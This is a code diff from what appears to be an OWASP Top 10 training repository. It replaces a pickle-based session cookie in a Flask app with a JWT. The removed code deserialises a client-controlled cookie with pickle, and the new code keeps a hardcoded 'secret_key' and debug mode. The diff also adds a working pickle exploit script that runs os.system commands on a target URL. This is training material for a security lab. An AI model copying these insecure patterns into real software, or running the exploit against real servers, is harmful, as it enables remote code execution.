globocom · RayTdC · May 8, 2024 · Sep 25, 2024
diff --git a/owasp-top10-2021-apps/a8/amarelo-designs/app/app.py b/owasp-top10-2021-apps/a8/amarelo-designs/app/app.py
@@ -1,29 +1,27 @@
 # coding: utf-8
 
 from flask import Flask, request, make_response, render_template, redirect, flash
-import uuid
-import pickle
-import base64
+import jwt
+
 app = Flask(__name__)
+app.secret_key = 'secret_key' 
 
 
 @app.route("/")
 def ola():
     return render_template('index.html')
 
-@app.route("/admin", methods=['GET','POST'])
+
+@app.route("/admin", methods=['GET', 'POST'])
 def login():
     if request.method == 'POST':
         username = request.values.get('username')
         password = request.values.get('password')
-    
+
         if username == "admin" and password == "admin":
-            token = str(uuid.uuid4().hex)
-            cookie = { "username":username, "admin":True, "sessionId":token }
-            pickle_resultado = pickle.dumps(cookie)
-            encodedSessionCookie = base64.b64encode(pickle_resultado)
+            token = jwt.encode({'username': username, 'admin': True}, app.secret_key, algorithm='HS256')
             resp = make_response(redirect("/user"))
-            resp.set_cookie("sessionId", encodedSessionCookie)
+            resp.set_cookie("token", token)
             return resp
 
         else:
@@ -32,17 +30,23 @@
     else:
         return render_template('admin.html')
 
+
 @app.route("/user", methods=['GET'])
 def userInfo():
-    cookie = request.cookies.get("sessionId")
-    if cookie == None:
+    token = request.cookies.get("token")
+    if not token:
         return "Não Autorizado!"
-    cookie = pickle.loads(base64.b64decode(cookie))
-
-    return render_template('user.html')
-
 
+    try:
+        payload = jwt.decode(token, app.secret_key, algorithms=['HS256'])
+        username = payload['username']
+        return render_template('user.html', username=username)
+    except jwt.ExpiredSignatureError:
+        return "Token expirado. Por favor, faça login novamente."
+    except jwt.InvalidTokenError:
+        return "Token inválido. Por favor, faça login novamente."
 
 
 if __name__ == '__main__':
-    app.run(debug=True,host='0.0.0.0')
+    app.run(debug=True, host='0.0.0.0')
+
diff --git a/owasp-top10-2021-apps/a8/amarelo-designs/app/requirements.txt b/owasp-top10-2021-apps/a8/amarelo-designs/app/requirements.txt
@@ -1,2 +1,3 @@
 flask
-Flask
+Flask
+pyjwt
diff --git a/owasp-top10-2021-apps/a8/amarelo-designs/deployments/Dockerfile b/owasp-top10-2021-apps/a8/amarelo-designs/deployments/Dockerfile
@@ -1,6 +1,8 @@
 FROM python:3
 WORKDIR /app
 ADD app/requirements.txt /app/requirements.txt
-RUN apt-get update && apt-get -y install netcat && apt-get clean
-RUN pip install -r requirements.txt
-CMD python app.py
+# Consertando a build, instalando o pacote netcat-traditional ao invés de `netcat`
+RUN apt-get update && apt-get -y install netcat-traditional && apt-get clean 
+RUN pip3 install -r requirements.txt
+CMD python app.py
+
diff --git a/owasp-top10-2021-apps/a8/amarelo-designs/serializaPickle.py b/owasp-top10-2021-apps/a8/amarelo-designs/serializaPickle.py
@@ -0,0 +1,28 @@
+import pickle
+import os
+import base64
+import sys
+import requests
+
+cmd = str(sys.argv[1])
+url = str(sys.argv[2])
+
+
+class Exploit(object):
+    def __reduce__(self):
+        return (os.system, (cmd, ))
+
+
+pickle_result = pickle.dumps(Exploit())
+
+result = str(base64.b64encode(pickle_result), "utf-8")
+
+print(result)
+print(cmd)
+print(url)
+
+cookie = {'sessionId': result}
+
+print(cookie)
+
+r = requests.get(url, cookies=cookie)
-Original file line number
+Diff line change
@@ -1,2 +1,3 @@
     flask
-    Flask
+    Flask
+    pyjwt